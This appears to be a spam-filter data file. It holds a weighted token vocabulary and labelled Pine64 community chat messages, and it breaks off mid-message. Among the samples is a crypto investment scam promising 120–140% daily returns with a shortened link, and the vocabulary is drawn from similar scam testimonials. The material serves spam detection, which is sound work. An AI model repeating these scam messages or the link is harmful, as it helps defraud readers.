"\ud835\udc29\ud835\udc1a\ud835\udc32": [0, 65535], "\ud835\udc28\ud835\udc2e\ud835\udc2b": [0, 65535], "\ud835\udc1b\ud835\udc22\ud835\udc25\ud835\udc25\ud835\udc2c": [0, 65535], "\ud835\udc25\ud835\udc28\ud835\udc2f\ud835\udc1e": [0, 65535], "tyler": [0, 65535], "parsons": [0, 65535], "\ud835\udc23\ud835\udc28\ud835\udc22\ud835\udc27": [0, 65535], "\ud835\udc25\ud835\udc22\ud835\udc27\ud835\udc24": [0, 65535], "szfgkrnl": [0, 65535], "lnjg": [0, 65535], "xlaura": [0, 65535], "beccari": [0, 65535], "cellulare": [0, 65535], "faith": [0, 65535], "reaping": [0, 65535], "charliefx": [0, 65535], "lff": [0, 65535], "ginlsozmdm": [0, 65535], "jdps": [0, 65535], "sl": [0, 65535], "gs": [0, 65535], "vault": [0, 65535], "emily": [0, 65535], "garz": [0, 65535], "gh": [0, 65535], "sxjppkoz": [0, 65535], "mgv": [0, 65535], "gexybhxkppfwct": [0, 65535], "immed": [0, 65535], "vcird": [0, 65535], "commentbitminbtc": [0, 65535], "sideways": [0, 65535], "loyal": [0, 65535], "empowerment": [0, 65535], "cater": [0, 65535], "dissapointed": [0, 65535], "zsrl": [0, 65535], "oat": [0, 65535], "nfts": [0, 65535], "vv": [0, 65535], "dapps": [0, 65535], "raul": [0, 65535], "withdrawn": [0, 65535], "gleeful": [0, 65535], "akpy": [0, 65535], "hhmvnjymq": [0, 65535], "female": [0, 65535], "male": [0, 65535], "xo": [0, 65535], "crkj": [0, 65535], "prom": [0, 65535], "canada": [0, 65535], "philippines": [0, 65535], "south": [0, 65535], "africa": [0, 65535], "malaysia": [0, 65535], "cambodia": [0, 65535], "nicholasfx": [0, 65535], "markley": [0, 65535], "baner": [0, 65535], "tpmybqdfdmuyciutgh": [0, 65535], "lknsp": [0, 65535], "giw": [0, 65535], "wac": [0, 65535], "ddea": [0, 65535], "dde": [0, 65535], "deceive": [0, 65535], "instaforex": [0, 65535], "dependable": [0, 65535], "lyoc": [0, 65535], "bjodg": [0, 65535], "hawkins": [0, 65535], "lowe": [0, 65535], "wollin": [0, 65535], "semeo": [0, 65535], "\ud835\udc24\ud835\udc27\ud835\udc1e\ud835\udc30": [0, 65535], "\ud835\udc30\ud835\udc21\ud835\udc1a\ud835\udc2d": [0, 65535], "\ud835\udc2d\ud835\udc28\ud835\udc1d\ud835\udc1a\ud835\udc32": [0, 65535], "\ud835\udc2c\ud835\udc2e\ud835\udc1f\ud835\udc1f\ud835\udc1e\ud835\udc2b\ud835\udc22\ud835\udc27\ud835\udc20": [0, 65535], "\ud835\udc2c\ud835\udc1a\ud835\udc30": [0, 65535], "\ud835\udc29\ud835\udc28\ud835\udc2c\ud835\udc2d": [0, 65535], "\ud835\udc1a\ud835\udc1b\ud835\udc28\ud835\udc2e\ud835\udc2d": [0, 65535], "\ud835\udc32\ud835\udc28\ud835\udc2e\ud835\udc2b": [0, 65535], "\ud835\udc2d\ud835\udc28\ud835\udc28\ud835\udc24": [0, 65535], "\ud835\udc2c\ud835\udc2d\ud835\udc1e\ud835\udc29": [0, 65535], "\ud835\udc2d\ud835\udc2b\ud835\udc32": [0, 65535], "\ud835\udc22\ud835\udc2d\ud835\udc2c": [0, 65535], "\ud835\udc20\ud835\udc28\ud835\udc22\ud835\udc27\ud835\udc20": [0, 65535], "\ud835\udc1f\ud835\udc22\ud835\udc27\ud835\udc1a\ud835\udc27\ud835\udc1c\ud835\udc22\ud835\udc1a\ud835\udc25\ud835\udc25\ud835\udc32": [0, 65535], "\ud835\udc30\ud835\udc1a\ud835\udc27\ud835\udc2d": [0, 65535], "\ud835\udc2c\ud835\udc21\ud835\udc1a\ud835\udc2b\ud835\udc1e": [0, 65535], "\ud835\udc25\ud835\udc1e\ud835\udc2d": [0, 65535], "\ud835\udc30\ud835\udc28\ud835\udc2b\ud835\udc25\ud835\udc1d": [0, 65535], "\ud835\udc2b\ud835\udc1e\ud835\udc2c\ud835\udc29\ud835\udc28\ud835\udc27\ud835\udc2c\ud835\udc22\ud835\udc1b\ud835\udc25\ud835\udc1e": [0, 65535], "wvjt": [0, 65535], "mda": [0, 65535], "unexplainable": [0, 65535], "pkmplixhhxinjfk": [0, 65535], "secondly": [0, 65535], "destroy": [0, 65535], "mindset": [0, 65535], "arthur": [0, 65535], "robinson": [0, 65535], "navlstwsflhlntu": [0, 65535], "simplifies": [0, 65535], "inspire": [0, 65535], "brilliant": [0, 65535], "\ud835\udc0c\ud835\udc1a\ud835\udc1d\ud835\udc1e": [0, 65535], "\ud835\udc1e\ud835\udc31\ud835\udc2d\ud835\udc2b\ud835\udc1a": [0, 65535], "\ud835\udc1c\ud835\udc1a\ud835\udc2c\ud835\udc21": [0, 65535], "\ud835\udc21\ud835\udc28\ud835\udc26\ud835\udc1e": [0, 65535], "georgina": [0, 65535], "burton": [0, 65535], "\ud835\udc28\ud835\udc2f\ud835\udc1e\ud835\udc2b": [0, 65535], "\ud835\udc24": [0, 65535], "\ud835\udc30\ud835\udc1e\ud835\udc1e\ud835\udc24": [0, 65535], "\ud835\udc1e\ud835\udc27\ud835\udc20\ud835\udc1a\ud835\udc20\ud835\udc1e": [0, 65535], "\ud835\udc1d\ud835\udc28\ud835\udc27": [0, 65535], "\ud835\udc2d": [0, 65535], "\ud835\udc1d\ud835\udc1e\ud835\udc29\ud835\udc1e\ud835\udc27\ud835\udc1d": [0, 65535], "\ud835\udc29\ud835\udc1a\ud835\udc32\ud835\udc1c\ud835\udc21\ud835\udc1e\ud835\udc1c\ud835\udc24": [0, 65535], "\ud835\udc1a\ud835\udc27\ud835\udc32\ud835\udc26\ud835\udc28\ud835\udc2b\ud835\udc1e": [0, 65535], "keefrjol": [0, 65535], "mge": [0, 65535], "muchas": [0, 65535], "gracias": [0, 65535], "administrador": [0, 65535], "oportunidad": [0, 65535], "poder": [0, 65535], "hacer": [0, 65535], "tales": [0, 65535], "inversiones": [0, 65535], "problemas": [0, 65535], "retirarme": [0, 65535], "dios": [0, 65535], "te": [0, 65535], "bendiga": [0, 65535], "jbyn": [0, 65535], "\ud835\udc6d\ud835\udc90\ud835\udc93\ud835\udc88\ud835\udc8a\ud835\udc97\ud835\udc86": [0, 65535], "\ud835\udc85\ud835\udc90\ud835\udc8a\ud835\udc8f\ud835\udc88": [0, 65535], "\ud835\udc70'\ud835\udc8e": [0, 65535], "\ud835\udc95\ud835\udc82\ud835\udc8d\ud835\udc8c\ud835\udc8a\ud835\udc8f\ud835\udc88": [0, 65535], "\ud835\udc84\ud835\udc90\ud835\udc8e\ud835\udc91\ud835\udc82\ud835\udc8f\ud835\udc9a": [0, 65535], "\ud835\udc8d\ud835\udc86\ud835\udc88\ud835\udc8a\ud835\udc95\ud835\udc8a\ud835\udc8e\ud835\udc82\ud835\udc84\ud835\udc9a": [0, 65535], "\ud835\udc96\ud835\udc8f\ud835\udc88\ud835\udc93\ud835\udc82\ud835\udc95\ud835\udc86\ud835\udc87\ud835\udc96\ud835\udc8d": [0, 65535], "\ud835\udc90\ud835\udc8f\ud835\udc8d\ud835\udc9a": [0, 65535], "\ud835\udc84\ud835\udc96\ud835\udc95": [0, 65535], "\ud835\udc8d\ud835\udc8a\ud835\udc8c\ud835\udc86": [0, 65535], "\ud835\udc8d\ud835\udc86\ud835\udc82\ud835\udc93\ud835\udc8f\ud835\udc8a\ud835\udc8f\ud835\udc88": [0, 65535], "\ud835\udc82\ud835\udc8a\ud835\udc93": [0, 65535], "\ud835\udc8d\ud835\udc90\ud835\udc8f\ud835\udc88": [0, 65535], "\ud835\udc8e\ud835\udc86\ud835\udc86\ud835\udc95\ud835\udc8a\ud835\udc8f\ud835\udc88": [0, 65535], "\ud835\udc95\ud835\udc93\ud835\udc96\ud835\udc94\ud835\udc95\ud835\udc87\ud835\udc96\ud835\udc8d": [0, 65535], "\ud835\udc8e\ud835\udc82\ud835\udc8f\ud835\udc82\ud835\udc88\ud835\udc86\ud835\udc93": [0, 65535], "\ud835\udc74r": [0, 65535], "bradley": [0, 65535], "walters": [0, 65535], "\ud835\udc98\ud835\udc8a\ud835\udc8d\ud835\udc8d": [0, 65535], "\ud835\udc8f\ud835\udc86\ud835\udc97\ud835\udc86\ud835\udc93": [0, 65535], "\ud835\udc94\ud835\udc95\ud835\udc90\ud835\udc91": [0, 65535], "\ud835\udc98\ud835\udc90\ud835\udc93\ud835\udc8c": [0, 65535], "\ud835\udc82\ud835\udc8d\ud835\udc98\ud835\udc82\ud835\udc9a\ud835\udc94": [0, 65535], "wbmrdn": [0, 65535], "zgq": [0, 65535], "\ud835\ude44'\ud835\ude62": [0, 65535], "\ud835\ude6b\ud835\ude5a\ud835\ude67\ud835\ude6e": [0, 65535], "\ud835\ude69\ud835\ude64\ud835\ude59\ud835\ude56\ud835\ude6e": [0, 65535], "\ud835\ude63\ud835\ude64\ud835\ude6c": [0, 65535], "\ud835\ude57\ud835\ude5a\ud835\ude58\ud835\ude56\ud835\ude6a\ud835\ude68\ud835\ude5a": [0, 65535], "\ud835\ude5b\ud835\ude5e\ud835\ude63\ud835\ude56\ud835\ude63\ud835\ude58\ud835\ude5e\ud835\ude56\ud835\ude61\ud835\ude61\ud835\ude6e": [0, 65535], "\ud835\ude5b\ud835\ude67\ud835\ude5a\ud835\ude5a": [0, 65535], "\ud835\ude59\ud835\ude5a\ud835\ude65\ud835\ude69": [0, 65535], "\ud835\ude61\ud835\ude56\ud835\ude68\ud835\ude69\ud835\ude61\ud835\ude6e": [0, 65535], "\ud835\ude6c\ud835\ude56\ud835\ude68": [0, 65535], "\ud835\ude61\ud835\ude5e\ud835\ude57\ud835\ude5a\ud835\ude67\ud835\ude56\ud835\ude69\ud835\ude5a\ud835\ude59": [0, 65535], "\ud835\ude5b\ud835\ude67\ud835\ude64\ud835\ude62": [0, 65535], "\ud835\ude69\ud835\ude64\ud835\ude6a\ud835\ude67": [0, 65535], "poverty": [0, 65535], "\ud835\ude5e\ud835\ude68": [0, 65535], "\ud835\ude5c\ud835\ude67\ud835\ude5a\ud835\ude56\ud835\ude69\ud835\ude5a\ud835\ude68\ud835\ude69": [0, 65535], "\ud835\ude5a\ud835\ude6b\ud835\ude5a\ud835\ude67": [0, 65535], "\ud835\ude58\ud835\ude56\ud835\ude62\ud835\ude5a": [0, 65535], "\ud835\ude56\ud835\ude58\ud835\ude67\ud835\ude64\ud835\ude68\ud835\ude68": [0, 65535], "\ud835\ude68\ud835\ude56\ud835\ude6c": [0, 65535], "\ud835\ude59\ud835\ude5e\ud835\ude5b\ud835\ude5b\ud835\ude5a\ud835\ude67\ud835\ude5a\ud835\ude63\ud835\ude69": [0, 65535], "\ud835\ude69\ud835\ude5a\ud835\ude68\ud835\ude69\ud835\ude5e\ud835\ude62\ud835\ude64\ud835\ude63\ud835\ude5e\ud835\ude5a\ud835\ude68": [0, 65535], "\ud835\ude01\ud835\uddf5\ud835\uddf2\ud835\uddf6\ud835\uddff": [0, 65535], "\ud835\ude5c\ud835\ude64\ud835\ude64\ud835\ude59": [0, 65535], "\ud835\ude6c\ud835\ude64\ud835\ude67\ud835\ude60\ud835\ude68": [0, 65535], "\ud835\ude59\ud835\ude5a\ud835\ude58\ud835\ude5e\ud835\ude59\ud835\ude5a\ud835\ude59": [0, 65535], "\ud835\ude5c\ud835\ude5e\ud835\ude6b\ud835\ude5a": [0, 65535], "\ud835\ude01\ud835\uddf5\ud835\uddf2\ud835\uddfa": [0, 65535], "t\ud835\ude5d\ud835\ude5ay": [0, 65535], "\ud835\ude59\ud835\ude64": [0, 65535], "\ud835\ude5c\ud835\ude67\ud835\ude5a\ud835\ude56\ud835\ude69": [0, 65535], "\ud835\uddff\ud835\uddf2\ud835\uddf0\ud835\uddf2\ud835\uddf6\ud835\ude03\ud835\uddf2\ud835\uddf1": [0, 65535], "\ud835\uddfa\ud835\ude06": [0, 65535], "\ud835\uddf6\ud835\uddfb": [0, 65535], "\ud835\ude6c\ud835\ude56\ud835\ude61\ud835\ude61\ud835\ude5a\ud835\ude69": [0, 65535], "\ud835\ude69\ud835\ude5d\ud835\ude56\ud835\ude63\ud835\ude60\ud835\ude68": [0, 65535], "\ud835\ude3f\ud835\ude64": [0, 65535], "\ud835\ude6c\ud835\ude5a\ud835\ude61\ud835\ude61": [0, 65535], "\ud835\ude58\ud835\ude64\ud835\ude63\ud835\ude69\ud835\ude56\ud835\ude58\ud835\ude69": [0, 65535], "t\ud835\ude5de\ud835\ude62": [0, 65535], "\ud835\udc27\ud835\udc28": [0, 65535], "\ud835\udc1e\ud835\udc31\ud835\udc29\ud835\udc1e\ud835\udc1c\ud835\udc2d\ud835\udc1a\ud835\udc2d\ud835\udc22\ud835\udc28\ud835\udc27\ud835\udc2c": [0, 65535], "\ud835\udc2e\ud835\udc27\ud835\udc2d\ud835\udc22\ud835\udc25": [0, 65535], "\ud835\udc26\ud835\udc32\ud835\udc2c\ud835\udc1e\ud835\udc25\ud835\udc1f": [0, 65535], "\ud835\udc20\ud835\udc2e\ud835\udc22\ud835\udc1d\ud835\udc1a\ud835\udc27\ud835\udc1c\ud835\udc1e": [0, 65535], "robinsonmasonfx": [0, 65535], "\ud835\udc1b\ud835\udc1e\ud835\udc32\ud835\udc28\ud835\udc27\ud835\udc1d": [0, 65535], "\ud835\udc1e\ud835\udc32\ud835\udc1e": [0, 65535], "\ud835\udc28\ud835\udc29\ud835\udc1e\ud835\udc27\ud835\udc22\ud835\udc27\ud835\udc20": [0, 65535], "\ud835\udc2d\ud835\udc21\ud835\udc1e\ud835\udc2c\ud835\udc1e": [0, 65535], "\ud835\udc2d\ud835\udc1e\ud835\udc1a\ud835\udc1c\ud835\udc21\ud835\udc22\ud835\udc27\ud835\udc20\ud835\udc2c": [0, 65535], "\ud835\udc2c\ud835\udc24\ud835\udc22\ud835\udc25\ud835\udc25": [0, 65535], "\ud835\udc22'\ud835\udc2f\ud835\udc1e": [0, 65535], "\ud835\udc27\ud835\udc28\ud835\udc2d\ud835\udc21\ud835\udc22\ud835\udc27\ud835\udc20": [0, 65535], "\ud835\udc1c\ud835\udc28\ud835\udc27\ud835\udc2d\ud835\udc22\ud835\udc27\ud835\udc2e\ud835\udc1e\ud835\udc1d": [0, 65535], "\ud835\udc2c\ud835\udc2e\ud835\udc1c\ud835\udc1c\ud835\udc1e\ud835\udc2c\ud835\udc2c": [0, 65535], "nmeyf": [0, 65535], "yntm": [0, 65535], "\ud835\udc13\ud835\udc21\ud835\udc22\ud835\udc2c": [0, 65535], "\ud835\udc2c\ud835\udc1a\ud835\udc26\ud835\udc1e": [0, 65535], "\ud835\udc2d\ud835\udc1e\ud835\udc2c\ud835\udc2d\ud835\udc22\ud835\udc26\ud835\udc28\ud835\udc27\ud835\udc32": [0, 65535], "\ud835\udc2c\ud835\udc28\ud835\udc26\ud835\udc1e\ud835\udc28\ud835\udc27\ud835\udc1e": [0, 65535], "\ud835\udc1e\ud835\udc1a\ud835\udc2b\ud835\udc27\ud835\udc1e\ud835\udc1d": [0, 65535], "holden": [0, 65535], "\ud835\udc1d\ud835\udc1e\ud835\udc1c\ud835\udc22\ud835\udc1d\ud835\udc1e\ud835\udc1d": [0, 65535], "\ud835\udc20\ud835\udc22\ud835\udc2f\ud835\udc1e": [0, 65535], "\ud835\udc2c\ud835\udc21\ud835\udc28\ud835\udc2b\ud835\udc2d": [0, 65535], "\ud835\udc29\ud835\udc1e\ud835\udc2b\ud835\udc22\ud835\udc28\ud835\udc1d": [0, 65535], "myiylucgn": [0, 65535], "cease": [0, 65535], "hopeless": [0, 65535], "restless": [0, 65535], "sx": [0, 65535], "jbkm": [0, 65535], "debts": [0, 65535], "l've": [0, 65535], "favour": [0, 65535], "wmyt": [0, 65535], "nxkpjkzytjh": [0, 65535], "llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll": [0, 65535], "\ud835\uddc6\ud835\uddce\ud835\uddcc\ud835\uddcd": [0, 65535], "\ud835\uddba\ud835\uddc9\ud835\uddc9\ud835\uddcb\ud835\uddbe\ud835\uddbc\ud835\uddc2\ud835\uddba\ud835\uddcd\ud835\uddbe": [0, 65535], "hendrenbrian": [0, 65535], "\ud835\uddb3\ud835\uddc1\ud835\uddbe": [0, 65535], "\ud835\uddbb\ud835\uddbe\ud835\uddcc\ud835\uddcd": [0, 65535], "\ud835\uddbc\ud835\uddcb\ud835\uddd2\ud835\uddc9\ud835\uddcd\ud835\uddc8": [0, 65535], "\ud835\uddcd\ud835\uddcb\ud835\uddba\ud835\uddbd\ud835\uddbe\ud835\uddcb": [0, 65535], "\ud835\uddcd\ud835\uddc1\ud835\uddbe": [0, 65535], "\ud835\uddd0\ud835\uddc8\ud835\uddcb\ud835\uddc5\ud835\uddbd": [0, 65535], "\ud835\uddc1er": [0, 65535], "\ud835\uddc9\ud835\uddc5\ud835\uddba\ud835\uddcd\ud835\uddbf\ud835\uddc8\ud835\uddcb\ud835\uddc6": [0, 65535], "\ud835\uddbc\ud835\uddc1\ud835\uddc8\ud835\uddcc\ud835\uddbe": [0, 65535], "\ud835\uddc9\ud835\uddc5\ud835\uddba\ud835\uddc7": [0, 65535], "\ud835\uddbe\ud835\uddba\ud835\uddcb\ud835\uddc7\ud835\uddc2\ud835\uddc7\ud835\uddc0": [0, 65535], "\ud835\uddc2\ud835\uddc7": [0, 65535], "\ud835\uddbd\ud835\uddba\ud835\uddd2\ud835\uddcc": [0, 65535], "\ud835\uddcb\ud835\uddbe\ud835\uddbc\ud835\uddc2\ud835\uddbe\ud835\uddcf\ud835\uddbe\ud835\uddbd": [0, 65535], "\ud835\uddc2\ud835\uddcd": [0, 65535], "\ud835\uddcc\ud835\uddc8": [0, 65535], "\ud835\uddcc\ud835\uddce\ud835\uddc9\ud835\uddc9\ud835\uddcb\ud835\uddc2\ud835\uddcc\ud835\uddbe\ud835\uddbd": [0, 65535], "\ud835\uddcc\ud835\uddc1\ud835\uddc8\ud835\uddbc\ud835\uddc4\ud835\uddbe\ud835\uddbd": [0, 65535], "\ud835\uddba\ud835\uddbf\ud835\uddcd\ud835\uddbe\ud835\uddcb": [0, 65535], "\ud835\uddc6\ud835\uddce\ud835\uddbc\ud835\uddc1": [0, 65535], "\ud835\uddc9\ud835\uddba\ud835\uddc7\ud835\uddc2\ud835\uddbc\ud835\uddc4\ud835\uddc2\ud835\uddc7\ud835\udc54": [0, 65535], "\ud835\uddbf\ud835\uddbe\ud835\uddbe\ud835\uddc5": [0, 65535], "\ud835\uddcb\ud835\uddbe\ud835\uddc5\ud835\uddba\ud835\uddd1": [0, 65535], "\ud835\uddd2\ud835\uddc8u": [0, 65535], "dgbo": [0, 65535], "krkaw": [0, 65535], "lyty": [0, 65535], "\u026a\u0274\u1d20\u1d07s\u1d1b\u1d07\u1d05": [0, 65535], "\u0493\u1d0f\u0280\u1d07x": [0, 65535], "s\u029c\u1d07": [0, 65535], "\u1d18\u0280\u1d0f\u0493\u026a\u1d1b": [0, 65535], "\u1d0f\u0493": [0, 65535], "\u1d0f\u1d20\u1d07\u0280": [0, 65535], "\u029c\u0280s": [0, 65535], "\u1d1b\u0280\u1d00\u1d05\u1d07": [0, 65535], "\u1d18\u0280\u1d0f\u0493\u1d07ss\u026a\u1d0f\u0274\u1d00\u029f": [0, 65535], "\u0299\u1d07\u029c\u1d00\u029f\u0493": [0, 65535], "\u0493\u1d0f\u0280": [0, 65535], "\u1d0f\u0274\u029f\u028f": [0, 65535], "\u1d04\u029c\u1d00\u0280\u0262\u1d07\u1d05": [0, 65535], "\u0493\u0280\u1d0f\u1d0d": [0, 65535], "brittany": [0, 65535], "allen": [0, 65535], "alice": [0, 65535], "s\u029c\u1d07's": [0, 65535], "\u0262\u1d07\u0274\u026a\u1d1cs": [0, 65535], "\u0299\u1d07\u029c\u026a\u0274\u1d05": [0, 65535], "s\u1d1c\u1d04\u1d04\u1d07ss": [0, 65535], "\u0280\u1d07\u1d00\u1d04\u029c": [0, 65535], "\u1d00\u029fs\u1d0f": [0, 65535], "citizen": [0, 65535], "xrvjdnolscu": [0, 65535], "mtdk": [0, 65535], "burchett": [0, 65535], "vet": [0, 65535], "hol": [0, 65535], "vag": [0, 65535], "shrtm": [0, 65535], "nu": [0, 65535], "val": [0, 65535], "rts": [0, 65535], "chkyzskgvdldxrnfj": [0, 65535], "xc": [0, 65535], "tn": [0, 65535], "klfmevcbc": [0, 65535], "emilyes": [0, 65535], "ddf": [0, 65535], "klfme": [0, 65535], "vebc": [0, 65535], "\ud835\udc16\ud835\udc21\ud835\udc1e\ud835\udc27": [0, 65535], "\ud835\udc25\ud835\udc28\ud835\udc2c\ud835\udc2d": [0, 65535], "\ud835\udc23\ud835\udc28\ud835\udc1b": [0, 65535], "\ud835\udc08'\ud835\udc2f\ud835\udc1e": [0, 65535], "\ud835\udc25\ud835\udc22\ud835\udc2d\ud835\udc2d\ud835\udc25\ud835\udc1e": [0, 65535], "traderadrianfx": [0, 65535], "\ud835\udc2d\ud835\udc2e\ud835\udc2b\ud835\udc27\ud835\udc1e\ud835\udc1d": [0, 65535], "\ud835\udc1d\ud835\udc1a\ud835\udc32s": [0, 65535], "\ud835\udc2b\ud835\udc1e\ud835\udc1a\ud835\udc25\ud835\udc25\ud835\udc32": [0, 65535], "\ud835\udc2c\ud835\udc1a\ud835\udc2f\ud835\udc1e\ud835\udc1d": [0, 65535], "tkjkkpp": [0, 65535], "qhhogm": [0, 65535], "audited": [0, 65535], "insurance": [0, 65535], "rrlxnozxzu": [0, 65535], "quayle": [0, 65535], "scans": [0, 65535], "vivant": [0, 65535], "oor": [0, 65535], "avn": [0, 65535], "pee": [0, 65535], "paar": [0, 65535], "aday": [0, 65535], "fch": [0, 65535], "fbwhqw": [0, 65535], "zmrk": [0, 65535], "harvest": [0, 65535], "junction": [0, 65535], "formidable": [0, 65535], "wallace": [0, 65535], "turner": [0, 65535], "__names__": ["good", "spam"], "__version__": 3, "__raw__": [{"text": "Is there actually a plan for a Pine64 \"car dash-cam recording system\" ?\n- modular/extensible\n- i would really love to build one with night vision / heat sensor for wildlife detection/avoidance (kangaroos, deer, wombats, echidnas, foxes, etc. EVERYWHERE! )\nyes, that is what i meant, pine64 seems to have all the different parts\nalready\n", "category": "good"}, {"text": "Ayaay nice\n", "category": "good"}, {"text": "https://matrix.org/_matrix/media/v1/download/matrix.org/NwkxodNaknswfzWBQggezNiq\n", "category": "good"}, {"text": "wat\n", "category": "good"}, {"text": "mbohun: I was thinking about this for a longer time\n", "category": "good"}, {"text": "Tell us your thoughts\n", "category": "good"}, {"text": "it should be possible with to do with Allwinner S3 which is currently used in PineCube\n", "category": "good"}, {"text": "Forwarded from fredd774: Withdrawal profit received successfully \ud83d\udcaf\ud83d\udcafThis is indeed the best paying platform \u2764\ufe0fCapital-base is an investment company based in UK they offers 120% and 140% daily interest with 5% referral bonus. You can register for free and access your dashboard Best paying platform for crypto currencieshttps://is.gd/ur2tsS :\n", "category": "spam"}, {"text": "that's even possible with an ESP32 or ESP32-cam \ud83d\ude04\n", "category": "good"}, {"text": "but low fps, no recording, etc.\n", "category": "good"}, {"text": "@arch frajer sa frizurom Tbh I have no idea what I would order\nI got a second hand PinePhone here\nMaybe a PineBook Pro\nFor uni\n", "category": "good"}, {"text": "Is pine phone shipping available to India?\n", "category": "good"}, {"text": "lol ok then\n", "category": "good"}, {"text": "> <@p64protocolbot:matrix.org> [T] <@Rahulraj> Is pine phone shipping available to India?\nI don't think so. Because of some customs law.\n", "category": "good"}, {"text": "are you going to fer, too, perchance?\n", "category": "good"}, {"text": "Rahulraj: nah, they don't ship to India\n@arch frajer sa frizurom mind that discord replies are not supported by the bridge\n", "category": "good"}, {"text": "ok i wont use replies\n", "category": "good"}, {"text": "Hi\nHow may I get my order status\n?\nThat's my last alternative\nI don't know if was shipped or not\n", "category": "good"}, {"text": "You get two emails, one with an order confirmation and one later on with a tracking number\nIf you haven't received the second email then it hasn't shipped yet\n", "category": "good"}, {"text": "@arch frajer sa frizurom I'm not going to FER, I'm going to a different city but virtually the same course\n", "category": "good"}, {"text": "kewl\n", "category": "good"}, {"text": "Hi guys!!\ni have a question about shipping\n", "category": "good"}, {"text": "Spit it out\n", "category": "good"}, {"text": "if i ordered one pinephone and 2x pinetime, How can I find out when it will be at my address?\ndate field on site not working\n", "category": "good"}, {"text": "You could order the PinePhone only individually, without the pinetime. For both orders you will get a mail with the tracking number once it ships\nWhich date field?\nOr are you asking how long it would roughly take?\n", "category": "good"}, {"text": "I have a flight on the 9th of next month it has to catch up\nwe can say from today until october 8\n", "category": "good"}, {"text": "They ship from China and the PinePhone is usually a pre-order depending on your location\n", "category": "good"}, {"text": "i'm in pennsylvania\n", "category": "good"}, {"text": "Then it also depends on the shipping method, courier or slow shipping \ud83d\ude1b\n", "category": "good"}, {"text": "May I know roughly how long it takes in America?\n", "category": "good"}, {"text": "Nah, that's not possible\n3 to 40 days\nLike said, it's a pre-order, there are different shipping methods\n", "category": "good"}, {"text": "OMG\nthanks man!\nthats bad for me :(\ni want to get pinephone but i will leave from USA\nand you are not shipping Turkey yet\n", "category": "good"}, {"text": "Well, did you order courier or standard and when?\n", "category": "good"}, {"text": "I haven't done it yet, I'm looking for the fastest way\n", "category": "good"}, {"text": "courier is fast but it's a pre-order \ud83d\ude04\nThe PinePhone ships roughly twice a month, so with some unlucky timing it might not reach you in time\n", "category": "good"}, {"text": "https://cdn.discordapp.com/attachments/463285150898192384/890381157961723934/2021-09-22-163552.webm\n@fireTwoOneNine custom GPU on the PinePhone64 System on a Chip ?\n", "category": "good"}, {"text": "the GPU on the pinephone is built into the same chip as the CPU\n", "category": "good"}, {"text": "@PiZZaMartijn i guess this is good idea\n", "category": "good"}, {"text": "I want more boards\nwhat would you all buy? \ud83d\ude1b\nI don\u2019t have any pine64 SBCs, excluding the pinetime, and pinebook pro\nThese two I won\u2019t buy (quartz maybe later)\nQuartz64: No, waiting for that one to mature. (Mostly because of the USB issue.)\nPine A64: far too slow.\nI guess that leaves the rockpro64. Rock64 is starting to show its age anyways\u2026 \ud83d\ude1b\n", "category": "good"}, {"text": "@GAMELASTER i like your banner !\n", "category": "good"}, {"text": "@GAMELASTER having devzone be public is not a good idea\n", "category": "good"}, {"text": "Not everything public, only parts which could be public\nThanks \ud83d\ude00\n", "category": "good"}, {"text": "that eeh, mostly will keep it down to nothing\n", "category": "good"}, {"text": "surely anything that would be public on devzone should be on the wiki instead\n", "category": "good"}, {"text": "yes\nexactly\n", "category": "good"}, {"text": "That's true\n", "category": "good"}, {"text": "because stuff shows up there before it's announced\nexactly\nyup\nbut that's mostly done in the public channels\nofcourse everything is as open as possible, but not everything can be public, which is why this needs to exist\nit's not like all the open developments is going away \ud83d\ude1b\nyou seem to think that the things that are in devzone were public before\n", "category": "good"}, {"text": "there isn't much reason for development work for current devices to happen on devzone\nthe wiki, public channels and mailing lists are far better platforms\ni don't think there's any intention of devzone being used for active development of stuff that you can go buy\n", "category": "good"}, {"text": "no the current projects are listed in the devzone\nso far nothing has happened on them\ndevzone is also just neat to keep track of who has which devkits etc, this is not replacing all the open development\n", "category": "good"}, {"text": "there's obviously no benefit to gatekeeping development efforts, that would kinda defeat the purpose of pine64... to the best of my knowledge it's not something anyone ever planned as a usecase for it\nfor the reasons you've stated - it would be dumb\n", "category": "good"}, {"text": "devzone is the bucket where all the small features are thrown in that are needed for organizing\nno, features for organizing. like developer lists, the signup stuff, timeline tracking\n", "category": "good"}, {"text": "ie for the people who are being sent devices for the purposes of working on them\n", "category": "good"}, {"text": "there definetly is\n", "category": "good"}, {"text": "there are plenty of reasons\n", "category": "good"}, {"text": "do you want to publicly list all the GDPR protected contact info of developers?\ntimeline might be public, but it's not exciting at all, and mostly used for tracking products that are not public yet\n", "category": "good"}, {"text": "something something D1 SBC :>\nalthough I'm still trying to figure out whether I want that\nI'll probably get it just for the novelty of RISC-V that's not a softcore\n", "category": "good"}, {"text": "that's not the intention ofcourse, and most of that development is already done split over the public chats here thanks to all the bridging that's done so devs on all platforms can talk together\nand a lot of development just happens in distribution specific chat channels\n", "category": "good"}, {"text": "I'm not a -huge- fan of knowledge being gated behind devzone, but my understanding is that it is primarily for knowledge that can't be shared for legal or other reasons\n", "category": "good"}, {"text": "if there is any info that _can_ be public, it _is_ public\n", "category": "good"}, {"text": "the development talks you refer to already happen outside of devzone\nmm, same\nI guess we'll see, I'm hoping for the best\nI'll be signing up for devzone once I get some working devices going and can do some dev\nI think, if the decision to publicise something is made because of policy, that the battle has already been lost\nThis only really works if people want their work to be public\n", "category": "good"}, {"text": "heh, who doesn't want credit\nit's not like the developers are pine64 developers and they start working in-company now, the developers working on pine products usually do that because they like working in the open \ud83d\ude42\n", "category": "good"}, {"text": "I want to apologize to the dev teams for the PR nightmare, and express my gratitude for the fact you didn't permaban me the moment I walked in here\n", "category": "good"}, {"text": "So, what are the plans if ARM won\u2019t license legitimate ARM cores to Rockchip anymore on account of the recent China shenanigans?\n", "category": "good"}, {"text": "Forwarded from unknown: \u1d2c\u1d50 \u1d5b\u1d49\u02b3\u02b8 \u1d4d\u02b3\u1d43\u1d57\u1d49\u1da0\u1d58\u02e1, \u02b7\u02b0\u1d43\u1d57 \u02b7\u2071\u02e1\u02e1 \u2071 \u02b3\u1d49\u1d43\u02e1\u02e1\u02b8 \u1d48\u1d52 \u1d57\u1d52 \u1d43\u1d56\u1d56\u02b3\u1d49\u1d9c\u2071\u1d43\u1d57\u1d49 \u02b8\u1d52\u1d58 \u02e2\u2071\u02b3, 